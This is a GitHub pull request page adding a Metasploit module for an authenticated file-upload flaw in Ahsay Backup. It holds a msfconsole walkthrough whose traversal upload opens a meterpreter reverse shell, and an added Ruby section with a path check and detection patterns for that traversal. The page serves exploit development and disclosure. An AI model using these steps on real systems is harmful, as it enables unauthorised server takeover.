
Ahsay backup v7.x - v8.1.1.50 file upload #12095

Merged
merged 9 commits into from
Jul 22, 2019

Conversation

@Wietsman (Contributor) commented Jul 16, 2019

This exploit will upload a file to the server; it is possible to change the path and upload it to a directory that is accessible through the webserver. For this to work a valid user account is necessary, but trial accounts are enabled by default and an account can be created this way.

Installation of Ahsay Backup:

  • Install Windows server
  • download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
  • Install cbs-win.exe on Windows server
  • Start the application (I start it manually from C:\Program Files\AhsayCBS\bin\startup.bat)

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/misc/ahsay_fileupload
  • Enable creation of a trial account: set CREATEACCOUNT true
  • Set RHOST: set RHOST 172.16.238.175
  • Set LHOST: set LHOST 172.16.238.235
  • Run the exploit: run
  • We should receive a meterpreter shell.

msfconsole output

msf > use exploit/windows/misc/ahsay_fileupload
msf exploit(windows/misc/ahsay_fileupload) > show options

Module options (exploit/windows/misc/ahsay_fileupload):

   Name           Current Setting            Required  Description
   ----           ---------------            --------  -----------
   CREATEACCOUNT  false                      no        Create Trial account
   PASSWORD       Ahsay01!                   yes       Password to Ahsay
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                                     yes       The target address
   RPORT          443                        yes       The target port (TCP)
   SSL            true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                          yes       Path to Ahsay
   UPLOADPATH     ../../webapps/cbs/help/en  no        Payload Path
   USERNAME       ahsay01                    yes       Username to Ahsay
   VHOST                                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator
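The module output above shows the two things a defender can act on: the upload path escapes the user's directory via `../` to land in the web root (`../../webapps/cbs/help/en`), and the payload is then triggered by requesting a `.jsp` from that help directory. The following Ruby is an added example written for this page, not code from the Metasploit module or from Ahsay: `safe_upload_path` shows the server-side check that would have stopped the traversal, and `scan_log` flags the two request patterns in a constructed, simplified access log. The upload root `/opt/AhsayCBS/user/ahsay01/files`, the `/obs/upload` endpoint and the log format are all assumptions made up for the example; the real AhsayCBS endpoints and layout are not shown on the page.

```ruby
require 'uri'

# Hypothetical per-user upload root (made up for this example; not the real AhsayCBS layout).
UPLOAD_ROOT = '/opt/AhsayCBS/user/ahsay01/files'

# Mitigation: resolve the client-supplied path against the upload root and refuse any result
# that does not stay inside it. A value like "../../webapps/cbs/help/en/x.jsp" resolves to a
# directory outside the root and is rejected; an absolute path is rejected for the same reason.
def safe_upload_path(base, client_path)
  root = File.expand_path(base)
  resolved = File.expand_path(client_path, root)
  return nil unless resolved == root || resolved.start_with?(root + '/')
  resolved
end

# Detection patterns derived from the module output: a traversal sequence in a request
# (checked after URL-decoding, so %2e%2e%2f is caught too) and a GET for a .jsp under the
# documentation directory /cbs/help/, which is where the uploaded JSP was triggered.
TRAVERSAL   = %r{(\.\./|\.\.\\)}
JSP_IN_HELP = %r{\A/cbs/help/.*\.jsp}i

# Returns a list of reason strings for one request; empty means nothing suspicious.
def scan_request(method, raw_path)
  decoded = begin
    URI.decode_www_form_component(raw_path)
  rescue ArgumentError
    raw_path # malformed percent-encoding: scan the raw string instead
  end
  findings = []
  findings << 'path traversal in request' if decoded.match?(TRAVERSAL)
  path_only = decoded.split('?', 2).first
  findings << 'JSP requested from help directory' if method == 'GET' && path_only.match?(JSP_IN_HELP)
  findings
end

# Constructed sample log in a simplified "ip method path status" format. The /obs/upload
# endpoint and /cbs/main.jsp are invented; the file name and IPs mirror the module output above.
SAMPLE_LOG = <<~LOG
  172.16.238.235 GET /cbs/help/en/index.html 200
  172.16.238.235 POST /obs/upload?path=..%2F..%2Fwebapps%2Fcbs%2Fhelp%2Fen%2FmyjnJMFlNi.jsp 200
  172.16.238.235 GET /cbs/help/en/myjnJMFlNi.jsp 200
  10.0.0.7 GET /cbs/main.jsp 200
LOG

# Walks every log line and returns one hash per finding, keyed by line number, client IP and reason.
def scan_log(text)
  text.each_line.with_index(1).flat_map do |line, n|
    ip, method, path, _status = line.split
    scan_request(method, path).map { |why| { line: n, ip: ip, reason: why } }
  end
end

if __FILE__ == $PROGRAM_NAME
  p safe_upload_path(UPLOAD_ROOT, '../../webapps/cbs/help/en/x.jsp') # nil: rejected
  p safe_upload_path(UPLOAD_ROOT, 'backup-2019.zip')                 # stays under the root
  scan_log(SAMPLE_LOG).each { |f| puts "line #{f[:line]} #{f[:ip]}: #{f[:reason]}" }
end
```

The second log line alone is enough to raise an alert, since a legitimate client has no reason to send a traversal sequence into `webapps`; the third line is the confirmation that the upload succeeded and was executed, so both should be correlated with the trial-account creation that the module performs when CREATEACCOUNT is set.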

@bcoles (Contributor) left a comment


syntax and style

modules/exploits/windows/misc/ahsay_backup_fileupload.rb (review comments, outdated and resolved)
@asoto-r7 asoto-r7 self-assigned this Jul 16, 2019
Wietsman and others added 4 commits July 16, 2019 22:37
@bcoles bcoles added docs and removed needs-docs labels Jul 17, 2019
Wietse Boonstra and others added 4 commits July 18, 2019 10:54
Added random username and password generating
#12095 Fixed trial account creation
#12095 Fixed calling functions
#12095 cleaned up the code
#12095 added more output
#12095 added comments
@asoto-r7 (Contributor) commented

@Wietsman : I just wanted to say it's been a pleasure working with you via the Metasploit Slack and I appreciate your willingness to add a version check and account cleanup. Thanks for the module!

@asoto-r7 asoto-r7 merged commit 3b08ed8 into rapid7:master Jul 22, 2019
@jmartin-tech (Contributor) commented Jul 25, 2019

Release Notes

The ahsay_fileupload module has been added to the framework. It exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50.

@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 6, 2019
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)
5 participants